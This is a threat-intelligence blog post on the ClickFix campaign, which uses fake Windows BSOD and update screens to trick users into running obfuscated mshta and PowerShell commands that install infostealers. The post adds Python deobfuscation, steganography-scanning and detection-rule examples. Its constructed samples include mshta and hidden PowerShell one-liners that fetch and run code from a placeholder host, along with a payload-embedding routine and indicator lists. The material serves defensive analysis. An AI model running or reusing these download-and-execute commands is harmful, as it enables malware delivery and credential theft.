
ClickFix Attack Exploits Fake Windows BSOD Screens to Deliver Malware on Windows Systems

  • Rescana
  • 2 days ago
  • 5 min read

Executive Summary

The ClickFix attack represents a significant escalation in social engineering and malware delivery tactics, using highly convincing fake Windows Blue Screen of Death (BSOD) and Windows Update screens to coerce users into executing malicious commands themselves. This campaign, also known as JackFix, is distributed primarily through fake adult websites and malvertising, and is characterized by heavy obfuscation, multi-stage payload delivery, and the simultaneous deployment of several infostealers and remote access trojans (RATs). The attack chain abuses legitimate, signed system utilities such as PowerShell and mshta.exe and relies on user interaction rather than on any software vulnerability, which lets it slip past controls that look for exploits or unsigned binaries rather than for suspicious use of built-in tools. The sophistication and psychological manipulation inherent in this campaign make it a critical threat to both individuals and organizations, with the potential for widespread credential theft, data exfiltration, and persistent access to compromised systems.

Threat Actor Profile

Attribution for the ClickFix campaign remains inconclusive, with no direct links to established Advanced Persistent Threat (APT) groups. However, several indicators suggest an Eastern European origin, including developer comments in Russian and the use of cloned Russian adult content platforms as lures. The threat actors demonstrate a high degree of technical proficiency, employing advanced obfuscation techniques, steganography, and multi-stage payload delivery mechanisms. Their operational tempo is rapid, with frequent updates to payloads and infrastructure, and a clear focus on maximizing infection rates through the deployment of multiple malware families in a single attack. The campaign’s infrastructure is robust, utilizing a rotating set of domains and IP addresses to evade detection and takedown efforts.

Technical Analysis of Malware/TTPs

The ClickFix attack chain is a multi-stage process that begins with the user being redirected to a malicious website, typically a convincing clone of a popular adult content platform. Once the visitor interacts with the page, it draws a full-screen overlay that mimics a Windows Update or BSOD screen, built from ordinary HTML, CSS, and JavaScript rather than anything the operating system renders. Keyboard handlers in the overlay swallow the usual escape routes (the Escape, F11, and F12 keys), and animated progress bars or error messages raise the pressure to act quickly.

The user is then instructed to copy and execute a command in PowerShell or CMD, purportedly to resolve the displayed issue. This command is heavily obfuscated, often encoded as a hex or charcode array, and typically leverages mshta.exe to fetch a remote .odd file containing further obfuscated JavaScript or PowerShell code. The initial script performs several key actions:

  • Downloads a large, obfuscated PowerShell payload.

  • Attempts to set Microsoft Defender exclusions for attacker-controlled directories and IP addresses.

  • Initiates an elevation loop: it relaunches itself with a User Account Control (UAC) prompt and re-prompts each time the user declines, until administrative rights are granted.
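The decoding step an analyst performs on the clipboard payload, as an added example (this is not code from the post, from Acronis, or from the campaign): it peels String.fromCharCode() arrays, 0x.. byte arrays, \xNN escapes and a PowerShell -EncodedCommand argument, then looks for the living-off-the-land markers the post describes. The sample inputs are constructed to have those shapes, the example.invalid hostname is a placeholder, and the token list is an assumption, not a vendor signature.

```python
"""Decode and triage a ClickFix-style clipboard command.

Added example; not code from the Rescana post, Acronis, or the campaign.
Sample inputs are constructed to mimic the encodings the post describes;
the token list is an assumption drawn from the TTPs, not a published rule.
"""
import base64
import re

# Tokens worth flagging once the command is readable (assumed list).
SUSPICIOUS_TOKENS = (
    "mshta", "powershell", "-w hidden", "-windowstyle hidden", "-enc",
    "-encodedcommand", "iex", "invoke-expression", "iwr", "downloadstring",
    "http://", "https://", "add-mppreference", "exclusionpath", ".odd",
)

CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+)\)", re.IGNORECASE)
HEX_ARRAY_RE = re.compile(r"(?:0x[0-9a-fA-F]{2}\s*,\s*){3,}0x[0-9a-fA-F]{2}")
HEX_ESCAPE_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}){4,}")
# Negative lookaheads keep this idempotent: a base64 blob already annotated
# with "<decoded: ...>" is not decoded a second time on the next pass.
ENC_RE = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})"
    r"(?![A-Za-z0-9+/=])(?!\s*<decoded:)", re.IGNORECASE)


def decode_charcode(text):
    """Replace each String.fromCharCode(...) call with the string it builds."""
    def repl(m):
        return "".join(chr(int(c)) for c in re.split(r"[\s,]+", m.group(1)) if c)
    return CHARCODE_RE.sub(repl, text)


def decode_hex_array(text):
    """Replace a run of 0x.. byte literals with the bytes they spell."""
    def repl(m):
        vals = re.findall(r"0x([0-9a-fA-F]{2})", m.group(0))
        return bytes(int(v, 16) for v in vals).decode("latin-1")
    return HEX_ARRAY_RE.sub(repl, text)


def decode_hex_escapes(text):
    """Replace JavaScript \\xNN escape runs with the characters they encode."""
    def repl(m):
        vals = re.findall(r"\\x([0-9a-fA-F]{2})", m.group(0))
        return bytes(int(v, 16) for v in vals).decode("latin-1")
    return HEX_ESCAPE_RE.sub(repl, text)


def decode_encoded_command(text):
    """Annotate a PowerShell -EncodedCommand argument with its UTF-16LE plaintext."""
    def repl(m):
        try:
            plain = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)  # not valid base64/UTF-16: leave it untouched
        return f"{m.group(0)} <decoded: {plain}>"
    return ENC_RE.sub(repl, text)


def deobfuscate(text, max_rounds=5):
    """Peel layers until a full pass changes nothing; nesting is common."""
    for _ in range(max_rounds):
        new = decode_encoded_command(
            decode_hex_escapes(decode_hex_array(decode_charcode(text))))
        if new == text:
            return new
        text = new
    return text


def triage(text):
    """Return the decoded command, the tokens found in it, and a verdict."""
    decoded = deobfuscate(text)
    lowered = decoded.lower()
    hits = [t for t in SUSPICIOUS_TOKENS if t in lowered]
    return {"decoded": decoded, "indicators": hits, "suspicious": len(hits) >= 2}


# Constructed sample 1: charcode wrapper around an mshta fetch of a remote .odd file.
SAMPLE_CHARCODE = (
    "var q=String.fromCharCode(109,115,104,116,97,32,104,116,116,112,58,47,47,"
    "101,120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,120,46,111,100,100);"
    "w.run(q);"
)
# Constructed sample 2: hex-escaped "powershell" launching a hidden, encoded command.
SAMPLE_HEX = "\\x70\\x6f\\x77\\x65\\x72\\x73\\x68\\x65\\x6c\\x6c -w hidden -enc aQBlAHgA"

if __name__ == "__main__":
    for sample in (SAMPLE_CHARCODE, SAMPLE_HEX, "echo hello"):
        print(triage(sample))
```

Two or more hits is a deliberately low bar: the goal at triage time is to surface anything that decodes to mshta or PowerShell reaching out to the network, and a human or a sandbox takes it from there.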

Once elevated, the script proceeds to download and execute up to eight distinct malware payloads, including the latest versions of Rhadamanthys, Vidar 2.0, RedLine, Amadey, and various custom .NET RATs and loaders. In some cases, payloads are delivered using steganography, with malicious code embedded in the color channels of PNG images and extracted by custom scripts. The deployed malware is capable of stealing credentials, browser data, cryptocurrency wallets, and providing persistent remote access for further exploitation.
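How a colour-channel steganography loader recovers its payload, and how a defender can scan an image for the same thing, as an added example that is not the campaign's loader or any vendor's code. The framing used here (a 4-byte little-endian length prefix, one payload byte per pixel, in a single channel of an 8-bit RGB buffer) is an assumption chosen for the demonstration; real samples vary in channel, framing and whether they use whole bytes or low bits, and the PNG decoding that precedes this step is left to an image library.

```python
"""Pull a payload out of one colour channel of an RGB pixel buffer.

Added example, not the campaign's extractor. Framing is an assumption:
4-byte little-endian length, then payload bytes, one per pixel, in one
channel. The "image" content is generated in code, not a real sample.
"""
import struct

CHANNELS = 3  # bytes per pixel: R, G, B


def background(width, height):
    """Deterministic stand-in for picture content (constructed)."""
    px = bytearray(width * height * CHANNELS)
    for i in range(width * height):
        px[i * CHANNELS] = (i * 7) & 0xFF
        px[i * CHANNELS + 1] = (i * 13) & 0xFF
        px[i * CHANNELS + 2] = (i * 3) & 0xFF
    return px


def embed(payload, width, height, channel=2):
    """Write length + payload into `channel` (0=R, 1=G, 2=B), one byte per pixel."""
    framed = struct.pack("<I", len(payload)) + payload
    if len(framed) > width * height:
        raise ValueError("image too small for payload")
    px = background(width, height)
    for i, b in enumerate(framed):
        px[i * CHANNELS + channel] = b
    return bytes(px)


def extract(pixels, channel):
    """Read one channel as a byte stream (a stride read) and honour the length prefix."""
    stream = pixels[channel::CHANNELS]
    if len(stream) < 4:
        return None
    (length,) = struct.unpack("<I", stream[:4])
    if length == 0 or length > len(stream) - 4:
        return None  # not this framing, or a truncated/corrupt image
    return bytes(stream[4:4 + length])


def looks_like_pe(blob):
    """Cheap header check: the DOS stub magic a .NET loader payload carries."""
    return blob is not None and blob[:2] == b"MZ"


def scan(pixels):
    """Try every channel; return (channel, payload) for the first PE-looking hit."""
    for ch in range(CHANNELS):
        blob = extract(pixels, ch)
        if looks_like_pe(blob):
            return ch, blob
    return None


if __name__ == "__main__":
    fake_pe = b"MZ" + bytes(range(60))  # constructed stand-in for an executable
    print(scan(embed(fake_pe, 16, 16, channel=2)))
    print(scan(bytes(background(16, 16))))
```

A scanner built this way only catches the framing it knows; its value is as a second opinion on images that arrive through an mshta or PowerShell download, where any channel that decodes to an MZ header is conclusive.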

Obfuscation and anti-analysis techniques are pervasive throughout the attack chain. Malicious URLs often redirect to benign sites (such as Google or Steam) when accessed directly, serving payloads only to specific PowerShell requests. The scripts are littered with junk code, random variable names, and AI-generated comments to frustrate static and dynamic analysis. The use of legitimate system utilities and user-driven execution further complicates detection and response efforts.

Exploitation in the Wild

The ClickFix campaign has been active since at least September 2025, with evidence of continuous updates and evolving payloads. Distribution is primarily achieved through malvertising on adult content sites, but instances have also been observed in phishing emails and direct messages. The campaign is browser-agnostic, functioning across Chrome, Edge, Firefox, and other major browsers, as it relies on web technologies and user interaction rather than exploiting browser vulnerabilities.

Victims are predominantly individual users, but the deployment of multiple infostealers and RATs in a single infection event poses a significant risk to organizations, particularly if a corporate device is compromised. The campaign’s infrastructure is resilient, with a rotating set of domains and IP addresses used to deliver payloads and maintain command and control (C2) channels. No exploitation of macOS, Linux, or mobile platforms has been observed as of June 2026.

Victimology and Targeting

The primary targets of the ClickFix campaign are individual users, especially those visiting adult content websites. However, the indiscriminate nature of the attack and the deployment of multiple credential-stealing malware families mean that organizational assets are at risk if a corporate device is infected. The campaign does not appear to target specific sectors or geographies, but the use of Russian-language infrastructure and lures suggests a focus on regions with significant Russian-speaking populations. The potential for lateral movement within organizational networks, credential compromise, and data exfiltration underscores the broader risk posed by this campaign.

Mitigation and Countermeasures

Organizations should implement a multi-layered defense strategy to mitigate the risk posed by the ClickFix campaign. Key recommendations include:

  • Block the indicators of compromise (IOCs) published in the vendor reports listed under References at the network perimeter, and alert on connections to those domains and IP addresses. Expect them to rotate, so treat the behaviors below as the durable signal.

  • Restrict or closely monitor PowerShell and mshta.exe, particularly for non-administrative users. mshta.exe launched with a URL as its argument, or spawning PowerShell, is rarely legitimate and is the earliest host-side sign of this chain.

  • Audit and alert on changes to Microsoft Defender exclusions (Defender's operational log records them as event ID 5007), with particular attention to exclusions for user-writable directories or for IP addresses.

  • Ensure that endpoint detection and response (EDR/XDR) solutions are configured to detect and block obfuscated PowerShell and mshta activity, as well as the execution of known infostealer and RAT payloads. Enable PowerShell script block logging and process command-line auditing so that the decoded commands, not just the process names, are visible to responders.

  • Conduct regular user education and awareness training, emphasizing that no genuine Windows update or error screen ever asks the user to copy and run a command, and that the Escape key failing to dismiss a "system" screen is itself a sign the screen is a web page.

  • Maintain up-to-date backups and incident response plans to facilitate rapid recovery in the event of a successful compromise. Because several credential stealers are dropped at once, treat any confirmed infection as a credential compromise and reset passwords and active sessions for the affected user.
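The detection side of these recommendations, as an added example that is not from the post or from any EDR product: four rules run over constructed event records modelled on Windows Security 4688 process-creation events (with command-line auditing on) and Defender operational event 5007. Field names, host and user names, and paths are assumptions for the example; map them onto your SIEM's schema before use.

```python
"""Detection rules for the ClickFix chain over constructed endpoint events.

Added example, not from the post or any vendor. EVENTS are constructed
records loosely modelled on Security 4688 (process creation) and
Microsoft-Windows-Windows Defender/Operational 5007 (configuration change);
the dict keys are assumptions for this example.
"""
import re

EVENTS = [
    # Constructed: mshta launched from the desktop shell, pulling a remote .odd file.
    {"id": 4688, "user": r"WS01\alice", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://example.invalid/update.odd"},
    # Constructed: the .odd script spawns hidden PowerShell that downloads the next stage.
    {"id": 4688, "user": r"WS01\alice", "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -nop -ep bypass -c "iex (iwr http://example.invalid/p)"'},
    # Constructed: Defender exclusion added for a user-writable directory.
    {"id": 5007, "user": "SYSTEM",
     "message": r"Windows Defender Antivirus Configuration has changed. "
                r"New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
                r"\C:\Users\alice\AppData\Local\Temp\upd = 0x0"},
    # Constructed benign noise: a signed installer running a local .hta, an admin one-liner.
    {"id": 4688, "user": r"WS01\svc_install", "parent": r"C:\Program Files\Vendor\setup.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta "C:\Program Files\Vendor\ui.hta"'},
    {"id": 4688, "user": r"WS01\bob", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Date"},
]

STEALTH_FLAGS = ("-w hidden", "-windowstyle hidden", "-enc", "-encodedcommand",
                 "-ep bypass", "-executionpolicy bypass", "-nop")
NETWORK_HINTS = ("http://", "https://", "iwr", "invoke-webrequest",
                 "downloadstring", "iex", "invoke-expression")
EXCLUSION_RE = re.compile(
    r"Exclusions\\(Paths|Processes|Extensions|IpAddresses)\\(.+?)\s*=\s*0x", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(?:Users|ProgramData|Temp|Public)\\", re.IGNORECASE)


def _is(image, name):
    """Case-insensitive match on the file name at the end of an image path."""
    return image.lower().endswith("\\" + name)


def rule_mshta_remote(ev):
    if ev["id"] == 4688 and _is(ev["image"], "mshta.exe"):
        cmd = ev["cmdline"].lower()
        if "http://" in cmd or "https://" in cmd:
            return "mshta fetching remote content"
    return None


def rule_hidden_powershell_download(ev):
    if ev["id"] == 4688 and (_is(ev["image"], "powershell.exe") or _is(ev["image"], "pwsh.exe")):
        cmd = ev["cmdline"].lower()
        if any(f in cmd for f in STEALTH_FLAGS) and any(h in cmd for h in NETWORK_HINTS):
            return "hidden/bypass PowerShell with download or in-memory execution"
    return None


def rule_mshta_spawns_powershell(ev):
    if ev["id"] == 4688 and _is(ev["parent"], "mshta.exe") and _is(ev["image"], "powershell.exe"):
        return "PowerShell spawned by mshta.exe"
    return None


def rule_defender_exclusion(ev):
    if ev["id"] != 5007:
        return None
    m = EXCLUSION_RE.search(ev["message"])
    if not m:
        return None
    kind, target = m.group(1), m.group(2)
    if kind.lower() == "ipaddresses" or USER_WRITABLE_RE.search(target):
        return f"Defender {kind} exclusion added for {target}"
    return f"Defender {kind} exclusion changed: {target}"  # lower severity, still review


RULES = (rule_mshta_remote, rule_hidden_powershell_download,
         rule_mshta_spawns_powershell, rule_defender_exclusion)


def run_rules(events):
    """Return one alert dict per (event, rule) match."""
    alerts = []
    for ev in events:
        for rule in RULES:
            why = rule(ev)
            if why:
                alerts.append({"rule": rule.__name__, "user": ev["user"], "why": why})
    return alerts


if __name__ == "__main__":
    for alert in run_rules(EVENTS):
        print(alert)
```

On the constructed records the two benign events produce nothing, while the three-step chain (mshta with a URL, hidden PowerShell under mshta, then the exclusion) produces four alerts for the same user within seconds; correlating them on user and time is what turns these into a single high-confidence incident rather than four tickets.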

References

Acronis Threat Research Unit: Fake adult websites pop realistic Windows Update screen to deliver stealers via ClickFix (Nov 2025) – https://www.acronis.com/en/tru/posts/fake-adult-websites-pop-realistic-windows-update-screen-to-deliver-stealers-via-clickfix/

Malwarebytes: New ClickFix wave infects users with hidden malware in images and fake Windows updates (Nov 2025) – https://www.malwarebytes.com/blog/news/2025/11/new-clickfix-wave-infects-users-with-hidden-malware-in-images-and-fake-windows-updates

Reddit: ClickFix attack uses fake Windows BSOD screens to push malware (2025) – https://www.reddit.com/r/cybersecurity/comments/1q5c8yw/clickfix_attack_uses_fake_windows_bsod_screens_to/

Securonix: Analyzing PHALT#BLYX: How Fake BSODs and Trusted Build Tools are Used to Construct a Malware Infection – https://www.securonix.com/blog/analyzing-phaltblyx-how-fake-bsods-and-trusted-build-tools-are-used-to-construct-a-malware-infection/

Microsoft Security Blog: Think before you Click(Fix): Analyzing the ClickFix social engineering technique – https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their supply chain and digital ecosystem. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and respond to emerging threats, ensuring robust protection for critical assets and data. For more information or to discuss how Rescana can support your organization’s cybersecurity posture, please contact us at ops@rescana.com.
